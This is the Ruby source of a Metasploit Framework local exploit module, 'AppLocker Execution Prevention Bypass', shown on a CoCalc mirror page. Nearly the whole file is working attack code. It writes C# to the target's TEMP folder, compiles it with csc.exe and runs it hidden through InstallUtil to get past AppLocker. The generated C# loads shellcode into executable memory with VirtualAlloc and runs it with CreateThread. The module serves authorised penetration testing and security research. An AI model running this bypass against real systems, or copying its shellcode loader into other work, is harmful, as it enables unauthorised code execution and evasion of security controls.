CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/applocker_bypass.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::FileDropper

10
  include Msf::Post::File

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'AppLocker Execution Prevention Bypass',

17
        'Description' => %q{

18
          This module will generate a .NET service executable on the target and utilize

19
          InstallUtil to run the payload bypassing the AppLocker protection.

20


21
          Currently only the InstallUtil method is provided, but future methods can be

22
          added easily.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Casey Smith', # Original AppLocker bypass research

27
          'OJ Reeves' # MSF module

28
        ],

29
        'Platform' => [ 'win' ],

30
        'Arch' => [ ARCH_X86, ARCH_X64 ],

31
        'SessionTypes' => [ 'meterpreter' ],

32
        'Targets' => [ [ 'Windows', {} ] ],

33
        'DefaultTarget' => 0,

34
        'DisclosureDate' => '2015-08-03',

35
        'References' => [

36
          ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']

37
        ],

38
        'Compat' => {

39
          'Meterpreter' => {

40
            'Commands' => %w[

41
              stdapi_sys_process_execute

42
            ]

43
          }

44
        }

45
      )

46
    )

47
  end

48


49
  # Run Method for when run command is issued

50
  def exploit

51
    if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/

52
      fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')

53
    end

54


55
    # sysinfo is only on meterpreter sessions

56
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

57


58
    execute_installutil

59
  end

60


61
  def execute_installutil

62
    envs = get_envs('TEMP', 'windir')

63


64
    dotnet_path = get_dotnet_path(envs['windir'])

65
    print_status("Using .NET path #{dotnet_path}")

66


67
    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"

68
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

69


70
    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

71


72
    print_status("Writing payload to #{cs_path}")

73
    write_file(cs_path, generate_csharp_source)

74
    register_files_for_cleanup(cs_path)

75


76
    print_status("Compiling payload to #{exe_path}")

77
    csc_path = "#{dotnet_path}\\csc.exe"

78
    csc_platform = payload.arch.first == ARCH_X86 ? ARCH_X86 : ARCH_X64

79
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

80
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

81


82
    print_status("Executing payload ...")

83
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")

84
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", { 'Hidden' => true })

85
    register_files_for_cleanup(exe_path)

86
  end

87


88
  def get_dotnet_path(windir)

89
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == ARCH_X86 ? '' : '64'}"

90
    paths = dir(base_path).select { |p| p[0] == 'v' }

91
    dotnet_path = nil

92


93
    paths.reverse.each do |p|

94
      path = "#{base_path}\\#{p}"

95
      if directory?(path) && file?("#{path}\\InstallUtil.exe")

96
        dotnet_path = path

97
        break

98
      end

99
    end

100


101
    unless dotnet_path

102
      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')

103
    end

104


105
    dotnet_path

106
  end

107


108
  def generate_csharp_source

109
    sc = payload.encoded.each_byte.map { |b| "0x#{b.to_s(16)}" }.join(',')

110
    cs = %Q^

111
using System;

112


113
namespace Pop

114
{

115
  public class Program { public static void Main() { } }

116


117
  [System.ComponentModel.RunInstaller(true)]

118
  public class Pop : System.Configuration.Install.Installer

119
  {

120
    private static Int32 MEM_COMMIT=0x1000;

121
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

122
    private static UInt32 INFINITE = 0xFFFFFFFF;

123


124
    [System.Runtime.InteropServices.DllImport("kernel32")]

125
    private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

126


127
    [System.Runtime.InteropServices.DllImport("kernel32")]

128
    private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

129


130
    [System.Runtime.InteropServices.DllImport("kernel32")]

131
    private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

132


133
    public override void Uninstall(System.Collections.IDictionary s)

134
    {

135
      byte[] sc = new byte[] {#{sc}};

136
      IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

137
      System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);

138
      IntPtr id = IntPtr.Zero;

139
      WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);

140
    }

141
  }

142
}

143
    ^

144


145
    cs

146
  end

147
end

148


149